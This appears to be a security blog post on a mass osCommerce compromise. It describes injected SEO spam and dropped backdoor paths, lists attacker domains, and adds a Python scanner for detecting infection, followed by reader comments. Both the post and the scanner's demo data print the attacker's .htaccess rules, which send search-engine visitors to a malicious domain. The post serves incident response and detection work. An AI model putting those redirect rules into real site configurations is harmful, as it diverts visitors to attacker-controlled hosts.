osCommerce attacks – kirm-sky.ru

We are seeing a very large number of osCommerce sites hacked in the last few days. If you are an osCommerce user, make sure to update it as soon as possible and check to see whether it has been infected (also remove file_manager.php from the admin directory).

These attacks seem to be using the same vulnerability exploited in the previous attacks (nt02.co.in, nt04.in, etc.).

The latest version consists of the following:

1 .htaccess is modified to redirect visitors arriving from search engines (Google, Ask, Yahoo, etc.) to kirm-sky.ru, voice-nano.ru, devisionnetwork.ru and others (the first domain alone shows up on more than 600 infected sites, according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]

2 Two backdoors are dropped: one at /js/conf.php and another at /flops.php. Remove both, then compare the rest of the tree against a clean copy of the same release to find any other PHP files that are not part of the official osCommerce distribution.

3 Blackhat SEO spam is injected into includes/application_bottom.php. That file is a legitimate part of osCommerce, so remove the injected code (or restore the file from a clean copy) rather than deleting the file itself.


All the domains used in this attack are hosted at 91.204.48.37:

kirm-ar.ru
kirmar.ru
classwoods.ru
enterteiment-wizrd.ru
class-woods.ru
relax-july.ru
ar-kirm.ru
enterteimentwizrd.ru
tecros.ru
tutaanti.ru
kirm-sky.ru
sky-ar.ru
devisionnetwork.ru
voice-nano.ru
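As an added example (this is not Sucuri's scanner and not osCommerce code), the following Python script checks a site root for the three indicators described above: an .htaccess RewriteRule that sends search-engine referrals to an external host (compared against the domain list), the two dropped backdoor paths, and PHP files that are missing from or differ from a manifest of the clean distribution, which catches the application_bottom.php injection. The manifest and the infected sample tree that demo() writes are constructed for the example; build the real manifest from a clean copy of your osCommerce release.

```python
"""Indicator scan for the osCommerce compromise described above.

Added example, not Sucuri's scanner and not osCommerce code. It reports
.htaccess rules that redirect search-engine referrals to an external host,
the two dropped backdoor paths, and PHP files missing from or differing
from a manifest of the clean distribution. The manifest and the infected
tree built by demo() are constructed for this example.
"""
import hashlib
import os
import re
import tempfile
from urllib.parse import urlparse

# Domains named in the post (all hosted on 91.204.48.37 at the time).
KNOWN_REDIRECT_DOMAINS = {
    "kirm-ar.ru", "kirmar.ru", "classwoods.ru", "enterteiment-wizrd.ru",
    "class-woods.ru", "relax-july.ru", "ar-kirm.ru", "enterteimentwizrd.ru",
    "tecros.ru", "tutaanti.ru", "kirm-sky.ru", "sky-ar.ru",
    "devisionnetwork.ru", "voice-nano.ru",
}
KNOWN_BACKDOOR_PATHS = {"js/conf.php", "flops.php"}
SEARCH_ENGINE_WORDS = ("google", "ask", "yahoo", "bing", "msn", "aol")
REWRITE_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I)

def analyze_htaccess(text):
    """One finding per external RewriteRule guarded by search-engine referer
    conditions; the guard hides the redirect from an owner who types the URL."""
    findings, referer_conds = [], []
    for line in text.splitlines():
        m = REWRITE_COND.match(line)
        if m:
            if any(w in m.group(1).lower() for w in SEARCH_ENGINE_WORDS):
                referer_conds.append(m.group(1))
            continue
        m = REWRITE_RULE.match(line)
        if m:
            host = (urlparse(m.group(1)).hostname or "").lower()
            if referer_conds:
                findings.append({"target": m.group(1), "host": host,
                                 "known_domain": host in KNOWN_REDIRECT_DOMAINS,
                                 "referer_conditions": len(referer_conds)})
            referer_conds = []  # a RewriteRule ends its RewriteCond chain
    return findings

def scan_site(root, manifest):
    """Walk the install at root; manifest maps '/'-separated relative paths of
    the clean distribution's PHP files to their SHA-256 hex digests."""
    report = {"htaccess": [], "backdoors": [], "modified": [], "unknown_php": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name == ".htaccess":
                with open(full, encoding="utf-8", errors="replace") as fh:
                    for f in analyze_htaccess(fh.read()):
                        report["htaccess"].append(dict(path=rel, **f))
            elif rel in KNOWN_BACKDOOR_PATHS:
                report["backdoors"].append(rel)
            elif name.lower().endswith(".php"):
                if rel not in manifest:
                    report["unknown_php"].append(rel)
                else:
                    with open(full, "rb") as fh:
                        if hashlib.sha256(fh.read()).hexdigest() != manifest[rel]:
                            report["modified"].append(rel)
    for key in ("backdoors", "modified", "unknown_php"):
        report[key].sort()
    return report

# Constructed stand-ins: two "clean" files plus the three changes from the post.
DEMO_CLEAN = {"index.php": "<?php // legitimate storefront\n",
              "includes/application_bottom.php": "<?php // legitimate footer\n"}
DEMO_MANIFEST = {p: hashlib.sha256(b.encode()).hexdigest() for p, b in DEMO_CLEAN.items()}
DEMO_INFECTED = {
    **DEMO_CLEAN,
    ".htaccess": ("RewriteEngine On\n"
                  "RewriteCond %{HTTP_REFERER} .*google.* [OR]\n"
                  "RewriteCond %{HTTP_REFERER} .*ask.* [OR]\n"
                  "RewriteCond %{HTTP_REFERER} .*yahoo.*\n"
                  "RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]\n"),
    "includes/application_bottom.php": DEMO_CLEAN["includes/application_bottom.php"]
        + '<div style="display:none">constructed SEO spam links</div>\n',
    "js/conf.php": "<?php // constructed stand-in for the dropped backdoor\n",
    "flops.php": "<?php // constructed stand-in for the dropped backdoor\n",
    "images/x.php": "<?php // constructed: not part of the distribution\n",
}

def demo():
    """Write the constructed infected tree to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in DEMO_INFECTED.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8", newline="") as fh:
                fh.write(body)
        return scan_site(root, DEMO_MANIFEST)

if __name__ == "__main__":
    print(demo())
```

Against a real site, call scan_site() on the web root with a manifest hashed from a pristine copy of the same release. Any referer-conditioned redirect to an external host deserves a look even when the host is not in the list above: the attackers have already moved from nt02.co.in and nt04.in to the domains listed here, so the pattern is a better indicator than the names.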

This is how our malware scanner detects an infected site:

[Screenshot: malware scanner result flagging the site as "OsCommerce hacked"]

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.


If your site is hacked and you need help, contact us at support@sucuri.net or http://sucuri.net

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.


  • http://www.facebook.com/people/Kyle-James-Robinson/586651010 Kyle James Robinson

    One question.

    “3 Blackhat SEO SPAM is added to includes/application_bottom.php.”

    Do I remove application_bottom.php from my root folder?

    Thanks

  • http://www.tiffanyjewelrygift.com tiffany jewelry

    I hate 07.in and kirm-sky.ru; they attack my site.

  • Ari_rains

    Please open it up..........
